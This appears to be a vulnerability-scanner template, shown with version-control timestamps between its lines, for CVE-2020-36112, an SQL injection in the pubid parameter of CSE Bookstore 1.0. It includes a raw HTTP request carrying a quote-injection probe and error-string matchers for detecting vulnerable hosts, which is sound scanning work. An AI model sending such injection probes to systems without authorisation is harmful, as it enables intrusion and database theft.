2021-05-18 22:56:54 +00:00
id : CVE-2020-36112
info :
name : CSE Bookstore 1.0 SQL Injection
author : geeknik
2021-06-02 06:39:35 +00:00
description : CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
2021-05-19 01:20:49 +00:00
reference : |
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
severity : critical
2021-05-18 22:56:54 +00:00
tags : cve,cve2020,sqli,cse
requests :
- raw :
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
Accept-Encoding : gzip, deflate
DNT : 1
Connection : close
Cookie : PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests : 1
matchers :
- type : word
part : body
words :
- "get book price failed! You have an error in your SQL syntax"
- "Can't retrieve data You have an error in your SQL syntax"
condition : or